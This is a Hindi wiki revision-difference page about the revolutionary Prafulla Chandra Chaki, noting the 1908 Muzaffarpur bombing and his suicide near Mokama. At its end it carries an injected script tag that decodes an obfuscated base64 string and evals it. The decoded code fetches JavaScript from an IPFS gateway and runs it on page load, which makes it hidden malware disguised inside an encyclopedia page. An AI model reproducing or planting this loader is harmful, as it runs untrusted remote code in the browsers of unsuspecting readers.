Difference between revisions of "प्रफुल्लचंद चाकी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 +
[[चित्र:Prafulla-Chandra.jpg|thumb|प्रफुल्लचंद चाकी]]
 
*प्रसिद्ध क्रान्तिकारी '''प्रफुल्लचंद चाकी''' जिन्होंने मुज़फ़्फ़पुर बम काण्ड में भाग लिया। [[30 अप्रॅल]], [[1908]] को मुज़फ़्फ़पुर के तत्कालीन ज़िला जज किग्सफोर्ड की बग्गी पर बम फैंका, परन्तु उसमें पिंग्ले कैनेडी नामक एडवोकेट की पत्नी और बेटी मारी गई थी।
 
*प्रसिद्ध क्रान्तिकारी '''प्रफुल्लचंद चाकी''' जिन्होंने मुज़फ़्फ़पुर बम काण्ड में भाग लिया। [[30 अप्रॅल]], [[1908]] को मुज़फ़्फ़पुर के तत्कालीन ज़िला जज किग्सफोर्ड की बग्गी पर बम फैंका, परन्तु उसमें पिंग्ले कैनेडी नामक एडवोकेट की पत्नी और बेटी मारी गई थी।
 
*प्रफुल्लचंद चाकी ने गिरफ्तारी से बचने के लिए खुद को मोकामा के पास गोली मारकर आत्महत्या कर ली थी।  
 
*प्रफुल्लचंद चाकी ने गिरफ्तारी से बचने के लिए खुद को मोकामा के पास गोली मारकर आत्महत्या कर ली थी।  

Revision as of 06:28, 10 April 2011

thumb|praphullachand chaki

  • prasiddh krantikari praphullachand chaki jinhoanne muzaffapur bam kand mean bhag liya. 30 aprॅl, 1908 ko muzaffapur ke tatkalin zila jaj kigsaphord ki baggi par bam phaianka, parantu usamean piangle kainedi namak edavoket ki patni aur beti mari gee thi.
  • praphullachand chaki ne giraphtari se bachane ke lie khud ko mokama ke pas goli marakar atmahatya kar li thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>